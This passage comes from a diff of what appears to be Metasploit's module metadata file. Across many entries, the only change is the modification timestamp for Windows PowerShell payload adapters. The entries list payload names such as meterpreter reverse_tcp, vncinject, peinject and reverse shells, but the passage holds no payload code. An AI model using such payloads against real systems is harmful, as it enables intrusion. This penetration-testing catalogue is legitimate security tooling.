+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/speak_pwned",
@@ -176113,7 +176436,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp",
@@ -176152,7 +176475,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_hidden_tcp",
@@ -176190,7 +176513,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp",
@@ -176229,7 +176552,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid",
@@ -176266,7 +176589,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_named_pipe",
@@ -176302,7 +176625,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_nonx_tcp",
@@ -176340,7 +176663,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_tcp",
@@ -176380,7 +176703,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_tcp_rc4",
@@ -176418,7 +176741,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/bind_tcp_uuid",
@@ -176455,7 +176778,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/find_tag",
@@ -176493,7 +176816,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_ipv6_tcp",
@@ -176529,7 +176852,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_nonx_tcp",
@@ -176566,7 +176889,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_ord_tcp",
@@ -176604,7 +176927,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp",
@@ -176642,7 +176965,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_allports",
@@ -176681,7 +177004,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_dns",
@@ -176721,7 +177044,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4",
@@ -176761,7 +177084,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4_dns",
@@ -176799,7 +177122,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_uuid",
@@ -176836,7 +177159,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/upexec/reverse_udp",
@@ -176875,7 +177198,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp",
@@ -176914,7 +177237,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_tcp",
@@ -176952,7 +177275,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp",
@@ -176991,7 +177314,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid",
@@ -177028,7 +177351,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_named_pipe",
@@ -177065,7 +177388,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_nonx_tcp",
@@ -177103,7 +177426,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_tcp",
@@ -177143,7 +177466,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_rc4",
@@ -177181,7 +177504,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_uuid",
@@ -177218,7 +177541,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/find_tag",
@@ -177257,7 +177580,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_hop_http",
@@ -177294,7 +177617,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_http",
@@ -177331,7 +177654,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_http_proxy_pstore",
@@ -177369,7 +177692,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_ipv6_tcp",
@@ -177406,7 +177729,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_nonx_tcp",
@@ -177443,7 +177766,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_ord_tcp",
@@ -177481,7 +177804,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp",
@@ -177519,7 +177842,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_allports",
@@ -177558,7 +177881,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_dns",
@@ -177598,7 +177921,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4",
@@ -177638,7 +177961,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns",
@@ -177676,7 +177999,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_uuid",
@@ -177714,7 +178037,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/vncinject/reverse_winhttp",
@@ -177750,7 +178073,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/encrypted_shell/reverse_tcp",
@@ -177785,7 +178108,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/exec",
@@ -177821,7 +178144,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/loadlibrary",
@@ -177856,7 +178179,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/messagebox",
@@ -177894,7 +178217,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp",
@@ -177932,7 +178255,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_ipv6_tcp_uuid",
@@ -177971,7 +178294,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_named_pipe",
@@ -178009,7 +178332,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp",
@@ -178051,7 +178374,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_rc4",
@@ -178089,7 +178412,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/bind_tcp_uuid",
@@ -178127,7 +178450,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_http",
@@ -178168,7 +178491,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_https",
@@ -178206,7 +178529,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_named_pipe",
@@ -178244,7 +178567,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp",
@@ -178286,7 +178609,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_rc4",
@@ -178324,7 +178647,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_tcp_uuid",
@@ -178362,7 +178685,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttp",
@@ -178400,7 +178723,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/meterpreter/reverse_winhttps",
@@ -178436,7 +178759,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp",
@@ -178473,7 +178796,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_ipv6_tcp_uuid",
@@ -178509,7 +178832,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_named_pipe",
@@ -178545,7 +178868,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp",
@@ -178586,7 +178909,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_rc4",
@@ -178623,7 +178946,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/bind_tcp_uuid",
@@ -178659,7 +178982,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_named_pipe",
@@ -178695,7 +179018,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp",
@@ -178736,7 +179059,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_rc4",
@@ -178773,7 +179096,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/peinject/reverse_tcp_uuid",
@@ -178808,7 +179131,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/pingback_reverse_tcp",
@@ -178845,7 +179168,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/powershell_bind_tcp",
@@ -178882,7 +179205,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp",
@@ -178919,7 +179242,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/powershell_reverse_tcp_ssl",
@@ -178954,7 +179277,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp",
@@ -178990,7 +179313,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_ipv6_tcp_uuid",
@@ -179026,7 +179349,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_named_pipe",
@@ -179061,7 +179384,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp",
@@ -179101,7 +179424,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_rc4",
@@ -179137,7 +179460,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
